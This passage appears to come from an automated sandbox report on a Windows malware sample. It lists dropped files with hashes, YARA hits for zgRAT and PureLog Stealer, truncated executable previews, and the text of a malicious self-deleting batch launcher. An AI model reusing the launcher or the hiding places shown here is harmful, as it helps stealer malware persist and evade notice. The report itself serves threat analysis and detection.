Preview:	3crnOOCP5cIkrY2r1sCgeEWhPsFJ51o9fcbtBEFVjX7tOPrJ0a4zNCayGJXfI2TExJFP6Iqwmq7GHmS9B5Te7zvcBnn1qkNrD25FKcNruHMhFUrd1XdNizH8XmNTfyGCdQCOrNzjsmtzmOXr5KASG9IOv6rhO3M6BKEzRcvni4f6FRWJPfXVxx5dHxdvgSUyaxycJhadYWuMeLJekhStg0INPkrd99HPjqgSc39rE36aDs86o8L8AkRjokNj06eYPemxo1Bqhlom4rKgmvzAyIP8Z7n1qa0IZhLiFKRx7fbY6pp6aq7FHdkGPnYrNJ9HugNWgmbbdBCTr0CtSqbAdvA57FTbvjjyfToZcSayPflFbRYYlpZgr8n8fRZaS9p4bOxXMnR9Qmv7K4eqq40GKDGhqq3K39fP0qoMdBM7XaQENpxlxsuXJiuYIQrftGFQHgHeQRMps2suwBTA2SXKPIGR6PENTqOQUA7riTUfgEpQzAlH6qmat5A9Z0hBN8VCncawDmcj82oKczb6n7RnDxhY98RrvTRhtnmXkzDUNDc1Q0gkYlXQrs804BwEUuxokGbzMDWy36ZAUqHJcrSK6A0AowciD89dQyQKYqXVPjXuT8fO3mmnbmskQaLakxu475tgZ7vwT75WnFqqROpaWVBnFq47f7ubycxXO8z61zTeqV6KueIWHUhl4GatDxRWNdiKSScSZtjhCh6uttNAyXTd4LdIiF2Di7QNwv2bB07YvAjXJq9UkQhzKEQGzUtT0f9EQt770w88a5s4mF92FidRabCsfwlrGohQBeGZsCdyRiZOWVetV1NSBroyqPcEKR1vXc2H8jJDEp91CyWJR1WOaPOT0SsdjZnAqn13dXuvsJNVrww22SwS4mUINjQq0pdoC9KY6cq4GlgRB2

C:\Recovery\66fc9ff0ee96c2

Download File

Process:	C:\Users\user\Desktop\0J5DzstGPi.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	189
Entropy (8bit):	5.639708287586055
Encrypted:	false
SSDEEP:	3:CGUVnk//nH0dls9h7gp/2WKJFfLXPR081Qc4acJ2sVzSpVGknUzMTCXQvEKjEeCe:CDxk//H0du9qp/9KPza81QK7Gkn3TCXq
MD5:	A466E141150072448A3F58EA0081391D
SHA1:	160C2E928F50A12A2209868D7E3C5E48F170951B
SHA-256:	DC3A1A4E738C9A97F496F152A8129DCAA92398988E751089DA8150BAAFFBC01D
SHA-512:	A16B94A99289E0DB56154B26C5F942B87F4F2625EAAC7F5DB7F49F79B339A5195BB042CD5B55D217A8352B6F61847D6189CD002F7ECD9B98E946BB36F1459EB8
Malicious:	false
Preview:	An5vq9A2ubTbMaY7DYnzQDvV65fU9n5BbUdxntjN0wXD4xmmAQALWa471jyudp2GgS916lUUza8eprbJT2TtnuoBaf5D5ytL3RhmyuqZ6pW6baSJIpblVJdwn8bbpQZAqxkYKyViM4w7Xrj9Nv5PWI0tyv8zTOtpQVQoz39UT2YaWfY6YcN4VJoi60kZz

C:\Recovery\sihost.exe

Download File

Process:	C:\Users\user\Desktop\0J5DzstGPi.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1958912
Entropy (8bit):	7.551015834552122
Encrypted:	false
SSDEEP:	49152:RbYg0qXO9NNBZXRd6ewK8LrcOk+tWh08RT:hYg039NNBx3lGMh08R
MD5:	FECAFE9A80257E221C47577E704498F3
SHA1:	79960AA863F445B93531AFC55AAD6215A2C1BB08
SHA-256:	953D9C6534DD4DDA5DC6C53755974E39947672EA521DDFB613A8C28A4F3C10E3
SHA-512:	C48694E93A5B46BB9CB6ADA78E8AD642D142BE7B27249BB5E75521B14EB5805C9CD51FA7836D91C40840F2E7FBB46E4B8AEEDB9EAB688FC26020EBA03F381141
Malicious:	true
Yara Hits:	Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Recovery\sihost.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\sihost.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\sihost.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\sihost.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\sihost.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\sihost.exe, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 71%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f............................>.... ........@.. .......................@............@.....................................K....... .................... ....................................................... ............... ..H............text...D.... ...................... ..`.rsrc... ...........................@....reloc....... ......................@..B................ .......H.......h...............(...'...d........................................0..........(.... ........8........E....)...N.......M...8$...(.... ....~z...{....9....& ....8....(.... ....~z...{....:....& ....8....(.... ....~z...{....:....& ....8y......0.......... ........8........E............%.......p.......8....r...ps....z~....9y... ....8....~....(3... .... .... ....s....~....(7....... ....~z...{....9~...& ....8s...8.... ....~z...{....:Z...& ....8O......... ....8?.......~....(;..

C:\Recovery\sihost.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\0J5DzstGPi.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

C:\Recovery\steBCuuQsIefcKufvgYbRBCxKhPR.exe

Download File

Process:	C:\Users\user\Desktop\0J5DzstGPi.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1958912
Entropy (8bit):	7.551015834552122
Encrypted:	false
SSDEEP:	49152:RbYg0qXO9NNBZXRd6ewK8LrcOk+tWh08RT:hYg039NNBx3lGMh08R
MD5:	FECAFE9A80257E221C47577E704498F3
SHA1:	79960AA863F445B93531AFC55AAD6215A2C1BB08
SHA-256:	953D9C6534DD4DDA5DC6C53755974E39947672EA521DDFB613A8C28A4F3C10E3
SHA-512:	C48694E93A5B46BB9CB6ADA78E8AD642D142BE7B27249BB5E75521B14EB5805C9CD51FA7836D91C40840F2E7FBB46E4B8AEEDB9EAB688FC26020EBA03F381141
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 71%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f............................>.... ........@.. .......................@............@.....................................K....... .................... ....................................................... ............... ..H............text...D.... ...................... ..`.rsrc... ...........................@....reloc....... ......................@..B................ .......H.......h...............(...'...d........................................0..........(.... ........8........E....)...N.......M...8$...(.... ....~z...{....9....& ....8....(.... ....~z...{....:....& ....8....(.... ....~z...{....:....& ....8y......0.......... ........8........E............%.......p.......8....r...ps....z~....9y... ....8....~....(3... .... .... ....s....~....(7....... ....~z...{....9~...& ....8s...8.... ....~z...{....:Z...& ....8O......... ....8?.......~....(;..

C:\Recovery\steBCuuQsIefcKufvgYbRBCxKhPR.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\0J5DzstGPi.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	false
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\Default\17c9f4d4cfaa6e

Download File

Process:	C:\Users\user\Desktop\0J5DzstGPi.exe
File Type:	ASCII text, with very long lines (922), with no line terminators
Category:	dropped
Size (bytes):	922
Entropy (8bit):	5.9028261358995575
Encrypted:	false
SSDEEP:	24:9kaKsrh0HPsq0ekEx+bQ4lXnqd4SS2R9f83/sa9W:ScqD/+bQ4lLWkvpW
MD5:	F3D3EF6D49EB3E0A9B14A32C45BA9DA6
SHA1:	77FCE8C4C9D21912FEB4F3CBBA76832851DB21FE
SHA-256:	9C48D6D84C7EF10B0D63626B3FF24239F7E0422AECBE17752D8869C56C16B7F4
SHA-512:	62F58E2AE059E59EB382AAEBE5D312FF6BC1CF967975485912BDF02FA67EB2235BF19166FB4D0FE738897C245EF3E3623C2D12E32677D14CAD9D6189943E1AFE
Malicious:	false
Preview:	JTwl5etZWSWCb0BzUGrrr9TjeymbQQyVedS3IuNJyheRCxEY6VwjVtNKAMGH1SJGdAh7hHqk3h3KeBgqtNf4dPAvQI35nGSfYXyBQG1ypLqx0Cp8paXnxPmOAwrZNu7xPXwHMeamWqPSiN4Nc5QMsosJukBdZbl4N3hcQhvL9uRGAUpw1e6SevElpnXmc7N5FUFppc65JEM7WlIa4Pl5eSacy6xnKJsChWBpPAGZhBIZiGODe6rNVRaw4m0tpTuAWJaAkdL3IMYdJA4rruINberP5OvmJWuNRIDYqNcBvxEI36m4sJC4Lgj1cLFVsiuvcKMB6fBdRHcnajV9m13AUzCvjL6eIHSMDSptul7MIinDD5b2zGt0otbnIbcvjgVJyPjH3mOA3r2wL8rnuDpCXchT1CkTJLmlMdPyWT8N1s771obJuyAg1SwWrPP1B41rEQjst2RaEbKoekcMkbjULGu3r2GGEHL61P2kEta1hkbZHH1HxCQkVgg8gpA1wKW7POxPr1I1BsxkoUvkA9TB0llUs4EYtiFWOeJ3TlZ54Zjnt6TL3a0w1VGondhwxtIcmbWJL2QZjYGaB7lvk3fSsSe2XeQ0EnILRHASjJ9BJbNdOqnp1vM3OztU6dwqlaV6Q4I47TMa3dJREBor1l8SaO7cXpVGXTasGRMThtrijv9upcQ4zEz9bCfB7pgR7FCkDbKwyUJH3aspOMx4ZbRTdaQDwLW1MZkesZrNRdFe4rGBT0xu2l2gytGmKHAn7R5dzO6zfjn5VwYwUPu6Xl9khEq9SEDKcbhmvmME38PS86KBVUS5XEQVSU6ui7gagcd4PvAsDpCZWqlk3oo7wHxYLLUbpbg6bzwgdQwjUk2sB09ltV14TioYpEsEajCmIG7h4FHn2EnLPEXULsrTjlm2LX0Yhs

C:\Users\Default\steBCuuQsIefcKufvgYbRBCxKhPR.exe

Download File

Process:	C:\Users\user\Desktop\0J5DzstGPi.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1958912
Entropy (8bit):	7.551015834552122
Encrypted:	false
SSDEEP:	49152:RbYg0qXO9NNBZXRd6ewK8LrcOk+tWh08RT:hYg039NNBx3lGMh08R
MD5:	FECAFE9A80257E221C47577E704498F3
SHA1:	79960AA863F445B93531AFC55AAD6215A2C1BB08
SHA-256:	953D9C6534DD4DDA5DC6C53755974E39947672EA521DDFB613A8C28A4F3C10E3
SHA-512:	C48694E93A5B46BB9CB6ADA78E8AD642D142BE7B27249BB5E75521B14EB5805C9CD51FA7836D91C40840F2E7FBB46E4B8AEEDB9EAB688FC26020EBA03F381141
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 71%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f............................>.... ........@.. .......................@............@.....................................K....... .................... ....................................................... ............... ..H............text...D.... ...................... ..`.rsrc... ...........................@....reloc....... ......................@..B................ .......H.......h...............(...'...d........................................0..........(.... ........8........E....)...N.......M...8$...(.... ....~z...{....9....& ....8....(.... ....~z...{....:....& ....8....(.... ....~z...{....:....& ....8y......0.......... ........8........E............%.......p.......8....r...ps....z~....9y... ....8....~....(3... .... .... ....s....~....(7....... ....~z...{....9~...& ....8s...8.... ....~z...{....:Z...& ....8O......... ....8?.......~....(;..

C:\Users\Default\steBCuuQsIefcKufvgYbRBCxKhPR.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\0J5DzstGPi.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	false
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\0J5DzstGPi.exe.log

Download File

Process:	C:\Users\user\Desktop\0J5DzstGPi.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1396
Entropy (8bit):	5.350961817021757
Encrypted:	false
SSDEEP:	24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNrJE4qtE4KlOU4mZsXE4Npv:MxHKQwYHKGSI6oPtHTHhAHKKkrJHmHKu
MD5:	EBB3E33FCCEC5303477CB59FA0916A28
SHA1:	BBF597668E3DB4721CA7B1E1FE3BA66E4D89CD89
SHA-256:	DF0C7154CD75ADDA09758C06F758D47F20921F0EB302310849175D3A7346561F
SHA-512:	663994B1F78D05972276CD30A28FE61B33902D71BF1DFE4A58EA8EEE753FBDE393213B5BA0C608B9064932F0360621AF4B4190976BE8C00824A6EA0D76334571
Malicious:	true
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..2,"System.Security, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Runtime.Serialization, Version=4.0.0.0, Culture=neutr

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\sihost.exe.log

Download File

Process:	C:\Recovery\sihost.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	847
Entropy (8bit):	5.354334472896228
Encrypted:	false
SSDEEP:	24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQwYHKGSI6oPtHTHhAHKKkb
MD5:	9F9FA9EFE67E9BBD165432FA39813EEA
SHA1:	6FE9587FB8B6D9FE9FA9ADE987CB8112C294247A
SHA-256:	4488EA75E0AC1E2DEB4B7FC35D304CAED2F877A7FB4CC6B8755AE13D709CF37B
SHA-512:	F4666179D760D32871DDF54700D6B283AD8DA82FA6B867A214557CBAB757F74ACDFCAD824FB188005C0CEF3B05BF2352B9CA51B2C55AECF762468BB8F5560DB3
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\steBCuuQsIefcKufvgYbRBCxKhPR.exe.log

Download File

Process:	C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1830
Entropy (8bit):	5.3661116947161815
Encrypted:	false
SSDEEP:	48:MxHKQwYHKGSI6oPtHTHhAHKKkrJHpHNpaHKlT4v1qHGIs0HKD:iqbYqGSI6oPtzHeqKktJtpaqZ4vwmj0K
MD5:	C2E0F17D6A14A9837FE55EE183305037
SHA1:	EB56F87DAE280A52D91E88872777FDEEB2E1DF76
SHA-256:	8D444C9F4CB992629221443E699471F7D71BA2F0FFFC1F9BEBBA9D2F18371D47
SHA-512:	F4C96FF497F0AF4756F6A65350B2F9CF3AE54CEF07E38FDF31AC653765F731256D2625E287C6AC3471A87297CC51EF4D37E857C7F51D4735681B20F0B376D855
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..2,"System.Security, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Management, Version=4.0.0.0, Culture=neutral, PublicK

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	modified
Size (bytes):	64
Entropy (8bit):	1.1510207563435464
Encrypted:	false
SSDEEP:	3:Nlllullkv/tz:NllU+v/
MD5:	6442F277E58B3984BA5EEE0C15C0C6AD
SHA1:	5343ADC2E7F102EC8FB6A101508730898CB14F57
SHA-256:	36B765624FCA82C57E4C5D3706FBD81B5419F18FC3DD7B77CD185E6E3483382D
SHA-512:	F9E62F510D5FB788F40EBA13287C282444607D2E0033D2233BC6C39CA3E1F5903B65A07F85FA0942BEDDCE2458861073772ACA06F291FA68F23C765B0CA5CA17
Malicious:	false
Preview:	@...e................................................@..........

C:\Users\user\AppData\Local\Temp\EfzlRmUGES

Download File

Process:	C:\Users\user\Desktop\0J5DzstGPi.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	25
Entropy (8bit):	4.243856189774723
Encrypted:	false
SSDEEP:	3:TGEy2X:v
MD5:	508CD2E21301392D481F40CE804831D5
SHA1:	582B167CF357E03A498C53692DDA284AC7AB0C72
SHA-256:	4A98AE822211E565E14A8206E7EAB138E317258283593465C974EFCEC19614EF
SHA-512:	126467F032AD3CB180E5B1F365971C0BCF600D6B45652E132EE928DDD7551293C9B41E92ED2BC06D17308CE16DC380000E84957EC68F9BE250BC8BC6BC629731
Malicious:	false
Preview:	sp3GD4CpiTsmY5Zl2LTGDHV7M

C:\Users\user\AppData\Local\Temp\LBEMCr2GFO.bat

Download File

Process:	C:\Users\user\Desktop\0J5DzstGPi.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	180
Entropy (8bit):	5.392410787285003
Encrypted:	false
SSDEEP:	3:mKDDVNGvTVLuVFcROr+jn9mVqiMLCIRAnQ5aH/HXquN90dbBktKcKZG1t+kiE2JH:hCRLuVFOOr+DEW9RAnH/3V0bKOZG1wkq
MD5:	94CAFB1086EC95B1AC6122F96CE38639
SHA1:	521BA1BEE25043C510C030F1F5E94B5327A6A289
SHA-256:	04A37B06962E434083F491055ADA7761A2B12127BC608BCD9DA43FB62DB10AD9
SHA-512:	135B800DCB2BE0B24E8D69A95DECF41AB0C7D2F5982AB1FC3553692BCEDE803D54BB9EACB16DA12CCAF1B6C3F211E464E3F17E0E107FADB5AB5157897143104A
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	@echo off..chcp 65001..ping -n 10 localhost > nul..start "" "C:\Windows\Branding\steBCuuQsIefcKufvgYbRBCxKhPR.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\LBEMCr2GFO.bat"

C:\Users\user\AppData\Local\Temp\RESB8C8.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
File Type:	Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x6e8, 10 symbols, created Mon Jan 6 10:50:48 2025, 1st section name ".debug$S"
Category:	dropped
Size (bytes):	1952
Entropy (8bit):	4.557211441871516
Encrypted:	false
SSDEEP:	24:HWbW96XOQtDfHMwKEsmNyluxOysuZhN7jSjRzPNnqpdt4+lEbNFjMyi0++UZ:nEzKhmMluOulajfqXSfbNtmh5Z
MD5:	DBC8884AA7B7DF93EBA30276CB27F321
SHA1:	CB5D36FEF817861AA4C8A1C9131E50207E16B5EC
SHA-256:	130FA8A9526D21B4B53EFFF928D2962D7ADBA23BC2E42698C625107E222165B0
SHA-512:	C919750137F1A26D24BE64D6ACD6E492C048468F0AB14342FF19D3220C740909A167FCE1D515124F39DCD9C87FD1E7E888FFCE950AB3F7CE61BDB4928B47E49D
Malicious:	false
Preview:	L.....{g.............debug$S........8...................@..B.rsrc$01................d...........@..@.rsrc$02........p...x...............@..@........<....c:\Windows\System32\CSC7B104E16ED56415BA0A4E98DBA784BC.TMP..................r.av..t.y..............4.......C:\Users\user\AppData\Local\Temp\RESB8C8.tmp.-.<....................a..Microsoft (R) CVTRES.^.=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe......................... .......8.......................P.......................h.......................................................\|...............................................\|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...T.....I.n.t.e.r.n.a.l.N.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1n40s1zx.4xu.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1s3kbphh.meu.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2zjle2qw.omm.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_32uwoelp.23q.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3cyf0slf.r5h.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_50lrsuxj.kcy.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_c3lduwkk.04x.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
